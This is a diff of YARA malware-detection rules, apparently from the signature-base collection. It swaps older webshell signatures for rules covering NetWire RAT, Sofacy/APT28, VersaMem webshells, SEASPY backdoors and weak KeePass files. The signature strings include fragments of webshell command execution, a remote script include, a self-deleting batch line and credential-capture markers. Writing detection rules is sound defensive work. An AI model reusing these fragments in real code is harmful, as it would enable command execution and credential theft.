+		logic_hash = "e939a5ab4a4b2b289d5809e18dd57dd85e3da19a176719adba4707dfd605fc81"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "WSOCK32.dll"
-		$s1 = "?bSUNKNOWNV"
-		$s7 = "p@gram Jm6h)"
-		$s8 = "ser32.dllCONFP@"
+		$str01 = "myWObject" fullword
+		$str02 = "myRObject" fullword
+		$opcodes01 = { 6A (02|03) 6A 00 6A 00 68 00 00 00 C0 50 FF 15 }
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Portlessinst
+rule SIGNATURE_BASE_VULN_Keepass_DB_Brute_Forcible : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file portlessinst.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c641c522-7844-5002-8ae7-4aaf60d1337d"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8935-L8948"
+		description = "Detects KeePass .kdbx password stores, which could be brute forced to steal the credentials. With AES-KDF and less than 65536 iterations the cracking speed with a single GPU is 20k/s, for the old default of 6.000 iterations it's 200k/s. Best remediation is to change the key derivative function to Argon2d and delete all older versions of the .kdbx"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b1a86e03-b3d1-5abc-9287-a4846451caff"
+		date = "2023-07-20"
+		modified = "2023-12-05"
+		reference = "https://keepass.info/help/base/security.html#secdictprotect"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_keepass_brute_forcible.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "74213856fc61475443a91cd84e2a6c2f"
-		logic_hash = "72ca80de2ad2048d1fcbbffeebd0e4fd7d9d47d6736360674e6a85ef9943abe8"
-		score = 75
+		logic_hash = "14460f7d4976a3bbd6de2f7cfccfbfec35eb780ab762396a6490669ddde59ce8"
+		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s2 = "Fail To Open Registry"
-		$s3 = "f<-WLEggDr\""
-		$s6 = "oMemoryCreateP"
+		$keepass_magic = { 03 D9 A2 9A 67 FB 4B B5 }
+		$below_65536_rounds = { 06 08 00 ?? ?? 00 00 00 00 00 00 07 10 00 }
 
 	condition:
-		all of them
+		$keepass_magic at 0 and $below_65536_rounds at 108
 }
-rule SIGNATURE_BASE_Setupbdoor
+rule SIGNATURE_BASE_Generic_Dropper : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file SetupBDoor.exe"
+		description = "Detects Dropper PDB string in file"
 		author = "Florian Roth (Nextron Systems)"
-		id = "055ff783-fa9f-5037-a3d6-88b58ec1612f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8949-L8960"
+		id = "60ce6a5c-2e12-515b-b8cb-8c87500cb37b"
+		date = "2018-03-03"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/JAHZVL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_dropper_pdb.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "41f89e20398368e742eda4a3b45716b6"
-		logic_hash = "b4b6a0e4b9f8975d769d340a420af37dbc344d32c72447a8c56b05e985e6d806"
+		logic_hash = "e4ef83796d232edf34a6339e00db486612a88ff2d054f1afcd524def2e53b3b7"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\BDoor\\SetupBDoor"
+		$s1 = "\\Release\\Dropper.pdb"
+		$s2 = "\\Release\\dropper.pdb"
+		$s3 = "\\Debug\\Dropper.pdb"
+		$s4 = "\\Debug\\dropper.pdb"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 1 of them
 }
-rule SIGNATURE_BASE_Phpshell_3
+rule SIGNATURE_BASE_Susp_Indicators_EXE : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file phpshell.php"
+		description = "Detects packed NullSoft Inst EXE with characteristics of NetWire RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2f0ddfef-b3b5-592b-a9fb-fae4d825d0af"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8961-L8973"
+		id = "b4015c24-d18e-51eb-9854-8cc0e6dba4d0"
+		date = "2018-01-05"
+		modified = "2023-12-05"
+		reference = "https://pastebin.com/8qaiyPxs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_netwire_rat.yar#L11-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
-		logic_hash = "b86fa40fd7bbcae86926182882faa226530e44c20bc611b8433a7da7f012106c"
-		score = 75
+		logic_hash = "9cb66435b78893daa5583475b14f0df2a5e8612f3aaf5cb02160991ab4d57d1b"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6de7f0276afa633044c375c5c630740af51e29b6a6f17a64fbdd227c641727a4"
 
 	strings:
-		$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
-		$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion"
+		$s2 = "Error! Bad token or internal error" fullword ascii
+		$s3 = "CRYPTBASE" fullword ascii
+		$s4 = "UXTHEME" fullword ascii
+		$s5 = "PROPSYS" fullword ascii
+		$s6 = "APPHELP" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3c ) ) == 0x4550 and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_BIN_Server
+rule SIGNATURE_BASE_Suspicious_BAT_Strings : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file Server.exe"
+		description = "Detects a string also used in Netwire RAT auxilliary"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1625b0ee-5f9f-57d8-8333-f175f46d6c59"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8974-L8990"
+		id = "5fe28555-96c8-54da-b047-7d0a7532a6d2"
+		date = "2018-01-05"
+		modified = "2023-12-05"
+		reference = "https://pastebin.com/8qaiyPxs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_netwire_rat.yar#L32-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
-		logic_hash = "34f9d78e0f61717fae2945e7a833c2c6d59e28035ee95da2c5d32b4e196bc957"
-		score = 75
+		logic_hash = "e643a5ef41d084e1b1a20be2c56328b72fedddbbce3c79d1e93cc8cfaa633e12"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "configserver"
-		$s1 = "GetLogicalDrives"
-		$s2 = "WinExec"
-		$s4 = "fxftest"
-		$s5 = "upfileok"
-		$s7 = "upfileer"
+		$s1 = "ping 192.0.2.2 -n 1" ascii
 
 	condition:
-		all of them
+		filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006
+rule SIGNATURE_BASE_Malicious_BAT_Strings : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file 2006.asp"
+		description = "Detects a string also used in Netwire RAT auxilliary"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8991-L9002"
+		id = "6e197d05-62eb-535d-8cd6-db8550e51588"
+		date = "2018-01-05"
+		modified = "2023-12-05"
+		reference = "https://pastebin.com/8qaiyPxs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_netwire_rat.yar#L47-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c19d6f4e069188f19b08fa94d44bc283"
-		logic_hash = "536232bbdd21bddb88eefe06a82927abcdd3ed10404c052957896960a6d10932"
-		score = 75
+		logic_hash = "1f39b3fd11e7450eb1eaddeeca60aa4970568efda6053029f85df42e2f9fdd6e"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "strBackDoor = strBackDoor "
+		$s1 = "call :deleteSelf&exit /b"
 
 	condition:
-		all of them
+		filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_R57Shell_3
+
+rule SIGNATURE_BASE_Sofacy_Campaign_Mal_Feb18_Cdnver : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file r57shell.php"
+		description = "Detects Sofacy malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4129d77c-2981-587b-a83e-8767dc3a48d8"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9003-L9014"
+		id = "a5c72ddd-91b0-5410-9d81-38a138ec7efe"
+		date = "2018-02-07"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/ClearskySec/status/960924755355369472"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy.yar#L4-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "87995a49f275b6b75abe2521e03ac2c0"
-		logic_hash = "0fdca080c7ce57b7bd818a968840aebf3c5c74f188ed062fec794bfadb4e75b0"
+		logic_hash = "cd3fa21710054a96cc85da13d98e0882deaa574708c833349638b57b6088131c"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8"
 
 	strings:
-		$s1 = "<b>\".$_POST['cmd']"
+		$x1 = "cdnver.dll" fullword wide
+		$x2 = { 25 73 0A 00 00 00 00 00 30 00 00 00 20 00 2D 00
+              20 00 00 00 0A 00 00 00 25 00 73 00 00 00 00 00
+              69 00 6D 00 61 00 67 00 65 00 2F 00 6A 00 70 00
+              65 00 67 }
+		$s1 = "S7%s - %lu" fullword ascii
+		$s2 = "SNFIRNW" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 90KB and ( pe.imphash ( ) == "01f3d0fe6fb9d9df24620e67afc143c7" or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Hdconfig
+
+rule SIGNATURE_BASE_Sofacy_Trojan_Loader_Feb18_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file HDConfig.exe"
+		description = "Sofacy Activity Feb 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6f743137-e85a-5298-b51e-c8792e507d28"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9015-L9030"
+		id = "358d7a77-0ff5-572e-9cd8-b2cebaace02f"
+		date = "2018-03-01"
+		modified = "2023-12-05"
+		reference = "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy.yar#L29-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7d60e552fdca57642fd30462416347bd"
-		logic_hash = "9001f79db15548cf3ca931d0043d078db7d900ab26093afbf5cd44d0a85800f4"
-		score = 60
-		quality = 55
-		tags = ""
+		logic_hash = "b1946af23fa0de69f5631a66fa211dab5d8731b5afdb23898428842232752e77"
+		score = 75
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "335565711db93cd02d948f472c51598be4d62d60f70f25a20449c07eae36c8c5"
 
 	strings:
-		$s0 = "An encryption key is derived from the password hash. "
-		$s3 = "A hash object has been created. "
-		$s4 = "Error during CryptCreateHash!"
-		$s5 = "A new key container has been created."
-		$s6 = "The password has been added to the hash. "
+		$x1 = "%appdata%\\nad.dll" fullword wide
+		$s3 = "%appdata%\\nad.bat" fullword wide
+		$s1 = "apds.dll" fullword ascii
+		$s2 = "nad.dll\"" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a2d1be6502b4b3c28959a4fb0196ea45" or pe.exports ( "VidBitRpl" ) or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_FSO_S_Ajan_2
+
+rule SIGNATURE_BASE_APT_ATP28_Sofacy_Indicators_May19_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file ajan.asp"
+		description = "Detects APT28 Sofacy indicators in samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a66c34ed-0ae2-5e04-bfc4-c82583c5e066"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9031-L9043"
+		id = "ca768b60-7094-537a-b848-28bd42555287"
+		date = "2019-05-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/cyb3rops/status/1129647994603790338"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy.yar#L53-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "22194f8c44524f80254e1b5aec67b03e"
-		logic_hash = "0ac31ee735c94289932369dfba5b408cbf71cc23fd48ce3e09dc7ce640a0d733"
-		score = 75
+		logic_hash = "4e3530f540cc66e99b82bd88887943c8e524d4d750734058d9a7b27f76bc6871"
+		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "80548416ffb3d156d3ad332718ed322ef54b8e7b2cc77a7c5457af57f51d987a"
+		hash2 = "b40909ac0b70b7bd82465dfc7761a6b4e0df55b894dd42290e3f72cb4280fa44"
 
 	strings:
-		$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
-		$s3 = "/file.zip"
+		$x1 = "c:\\Users\\user\\Desktop\\openssl-1.0.1e_m\\/ssl/cert.pem" ascii
+		$x2 = "C:\\Users\\User\\Desktop\\Downloader_Poco" ascii
+		$s1 = "w%SystemRoot%\\System32\\npmproxy.dll" fullword wide
+		$op0 = { e8 41 37 f6 ff 48 2b e0 e8 99 ff ff ff 48 8b d0 }
+		$op1 = { e9 34 3c e3 ff cc cc cc cc 48 8d 8a 20 }
+		$op2 = { e8 af bb ef ff b8 ff ff ff ff e9 f4 01 00 00 8b }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( pe.imphash ( ) == "f4e1c3aaec90d5dfa23c04da75ac9501" or 1 of ( $x* ) or ( $s1 and 2 of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_Webshell_And_Exploit_CN_APT_HK : WEBSHELL
+rule SIGNATURE_BASE_WEBSHELL_JAVA_Versamem_JAR_Aug24_1 : FILE
 {
 	meta:
-		description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eb37a22b-4e8a-5986-bd47-4ef5b4986f47"
-		date = "2014-10-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9045-L9060"
+		description = "Detects VersaMem Java webshell samples (as used by Volt Typhoon)"
+		author = "blacklotuslabs (modified by Florian Roth and X__Junior)"
+		id = "9b666e61-cfa8-58b3-a362-772cd907c57c"
+		date = "2024-08-27"
+		modified = "2024-08-29"
+		reference = "https://x.com/ryanaraine/status/1828440883315999117"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volttyphoon_versamem.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ec3f1e985585e1bf77a46e971a20cd127064a64467761a5a570548dd63ec57e2"
-		score = 50
+		logic_hash = "d21558eb6c8e700b8a4cb86fdaa5487179828152af68828e878397859d6d3952"
+		score = 75
 		quality = 85
-		tags = "WEBSHELL"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
-		$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
-		$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
+		$sa1 = "com.versa.vnms.ui.TestMain"
+		$sa2 = "captureLoginPasswordCode"
+		$sa3 = "com/versa/vnms/ui/services/impl/VersaAuthenticationServiceImpl"
+		$sa4 = "/tmp/.temp.data"
+		$sa5 = "getInsertCode"
+		$sa6 = "VersaMem"
+		$sa7 = "Versa-Auth"
+		$sb1 = "/tmp/.java_pid"
+		$sb2 = {2f 75 73 72 2f 62 69 6e 2f 70 67 72 65 70 01 00 02 2d 66 01 00 25 6f 72 67 2e 61 70 61 63 68 65 2e 63 61 74 61 6c 69 6e 61 2e 73 74 61 72 74 75 70 2e 42 6f 6f 74 73 74 72 61 70 07}
 
 	condition:
-		$a0 or ( all of ( $s* ) )
+		filesize < 5MB and ( 3 of them or all of ( $sb* ) )
 }
-rule SIGNATURE_BASE_JSP_Browser_APT_Webshell
+rule SIGNATURE_BASE_WEBSHELL_JAVA_Versamem_JAR_Aug24_2 : FILE
 {
 	meta:
-		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
-		author = "Florian Roth (Nextron Systems)"
-		id = "06988b5b-ec8b-5a10-b659-3e846057ea51"
-		date = "2014-10-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9062-L9076"
+		description = "Detects VersaMem Java webshell samples (as used by Volt Typhoon)"
+		author = "Florian Roth"
+		id = "5ca598ed-5d0a-563d-a5e8-f8229af2c949"
+		date = "2024-08-29"
+		modified = "2024-12-12"
+		reference = "https://x.com/craiu/status/1828687700884336990"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_volttyphoon_versamem.yar#L27-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a352bf394f1b4f70218650758db39225a5a505656299405ccd077592d29480a7"
-		score = 60
-		quality = 85
-		tags = ""
+		logic_hash = "0bdf3bf5130c51c1355f179704933ca473a702595c580642035c8d3b9aad5725"
+		score = 75
+		quality = 60
+		tags = "FILE"
+		hash1 = "4bcedac20a75e8f8833f4725adfc87577c32990c3783bf6c743f14599a176c37"
 
 	strings:
-		$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
-		$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
-		$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
-		$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
+		$x1 = "tomcat_memShell" ascii
+		$x2 = "versa/vnms/ui/config/" ascii fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x4b50 and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_JSP_Jfigueiredo_APT_Webshell
+rule SIGNATURE_BASE_SUSP_LNX_Byteencoder_Jan25 : FILE
 {
 	meta:
-		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b5080e43-44e2-54fa-b03a-057dc75d14db"
-		date = "2014-12-10"
-		modified = "2025-11-03"
-		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9078-L9091"
+		description = "Detects Linux binaries that encode bytes by splitting them into upper and lower nibbles and mapping them to custom lookup tables, seen being used by SEASPY and Bluez backdoors"
+		author = "MalGamy (Nextron System)"
+		id = "4866348a-2129-5f6a-9498-8ab1acfa74b4"
+		date = "2025-01-23"
+		modified = "2025-03-20"
+		reference = "https://www.securityweek.com/newly-discovered-turla-malware-targets-linux-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/seaspy_backdoor_jan25.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7efaca469d09ce7ecba4ed38cb0b07d1b9fc4f45172d2ffb6f5d3259c000fdc5"
-		score = 60
+		hash = "3e0312ce8d0c1e5c192dbb93cac4770a1205c56dc9d02a0510c7e10a15251de5"
+		hash = "301d58a6a1819466e77209dbf8ca635cbee3b45516e5ee228fea50ae4a27b7d5"
+		hash = "957c0c135b50d1c209840ec7ead60912a5ccefd2873bf5722cb85354cea4eb37"
+		hash = "5e3c128749f7ae4616a4620e0b53c0e5381724a790bba8314acb502ce7334df2"
+		hash = "b0b83e1c69aa8df6da4383230bef1ef46e09f3bf26cec877eac53a9d48dc53ca"
+		hash = "d21b40645e33638bd36b63582c2c6ad5e8230c731236a54e8e5f4139bad31fdf"
+		logic_hash = "c0fe841681d3aaa8687c95f475f68b2d8b2f26afe42e9d15c601602fcc5e50cb"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
-		$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
+		$op1 = {8B 45 FC 48 63 D0 48 8B 45 A8 48 01 C2 8B 45 BC C1 F8 04 83 E0 0F 48 98 0F B6 44 05 E0 88 02}
+		$op2 = {8B 45 FC 48 98 48 8D 50 01 48 8B 45 A8 48 01 C2 8B 45 BC 83 E0 0F 48 98 0F B6 44 05 C0 88 02}
 
 	condition:
-		all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 4MB and all of them
 }
-rule SIGNATURE_BASE_JSP_Jfigueiredo_APT_Webshell_2
+rule SIGNATURE_BASE_SUSP_LNX_Stackstring_Technique_Jan25 : FILE
 {
 	meta:
-		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
-		author = "Florian Roth (Nextron Systems)"
-		id = "91575627-78c1-5ca1-8180-cc4004df88e8"
-		date = "2014-12-10"
-		modified = "2025-11-03"
-		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9093-L9108"
+		description = "Detects suspicious Linux binaries using stack-based string manipulation techniques, which are often used to generate PTY (pseudo-terminal) device names for stealth or persistence, seen being used by SEASPY and Bluez backdoors"
+		author = "MalGamy (Nextron System)"
+		id = "6c81d8c1-0cfa-54d9-89d3-2b025cc22f13"
+		date = "2025-01-23"
+		modified = "2025-03-20"
+		reference = "https://www.securityweek.com/newly-discovered-turla-malware-targets-linux-systems/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/seaspy_backdoor_jan25.yar#L24-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f7fa5872d8eb4ba1d0b26d966d7650d70b1a10c56945d5a5340b8e1cb5d0f5f0"
-		score = 60
+		hash = "0e65a80c6331a0e8d7df05ac217a8a7fe03b88f1d304f2ff0a26b92ed89153f3"
+		hash = "3e0312ce8d0c1e5c192dbb93cac4770a1205c56dc9d02a0510c7e10a15251de5"
+		hash = "301d58a6a1819466e77209dbf8ca635cbee3b45516e5ee228fea50ae4a27b7d5"
+		hash = "957c0c135b50d1c209840ec7ead60912a5ccefd2873bf5722cb85354cea4eb37"
+		hash = "5e3c128749f7ae4616a4620e0b53c0e5381724a790bba8314acb502ce7334df2"
+		hash = "654b7c5b667e4d70ebb5fb1807dcd1ee5b453f45424eb59a287d86ad8d0598a1"
+		hash = "ac6a8ec0b92935b7faab05ca21a42ed9eecdc9243fcf1449cc8f050de38e4c4f"
+		logic_hash = "6efc2d7bd6ba1f39554bd6c378e5adb209419c90192fcba0a676b557e5b920b5"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
-		$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
-		$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
-		$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
+		$op1 = {C7 45 E0 70 71 72 73 C7 45 E4 74 75 76 77 C7 45 E8 78 79 7A 61 C7 45 EC 62 63 64 65 C6 45 F0 00 C7 45 C0 30 31 32 33 C7 45 C4 34 35 36 37 C7 45 C8 38 39 61 62 C7 45 CC 63 64 65 66}
 
 	condition:
-		all of ( $a* ) or all of ( $s* )
+		uint32be( 0 ) == 0x7f454c46 and filesize < 4MB and $op1
 }
-rule SIGNATURE_BASE_Webshell_Insomnia
+rule SIGNATURE_BASE_MAL_Fake_Document_Software_Indicators_Nov23 : FILE
 {
 	meta:
-		description = "Insomnia Webshell - file InsomniaShell.aspx"
-		author = "Florian Roth (Nextron Systems)"
-		id = "62ed3695-9ab8-54d4-a9d2-b6270c56ccfb"
-		date = "2014-12-09"
-		modified = "2025-11-03"
-		reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9110-L9131"
+		description = "Detects indicators of fake document/image utility software that acts as a downloader for additional malware"
+		author = "Jonathan Peters"
+		id = "231474cd-1ec9-5738-bf48-ef707689056d"
+		date = "2023-11-13"
+		modified = "2024-04-24"
+		reference = "https://nochlab.blogspot.com/2023/09/net-in-javascript-fake-pdf-converter.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_fake_document_software.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
-		logic_hash = "d170c60f94092a38ba4af92283debd059eef2e4c683fd7737ffd60d1a2581d9c"
+		logic_hash = "5f0a088bf672559fbac90313768d41b79be7f1f56c6ddb36f0dcd265a07f98b2"
 		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
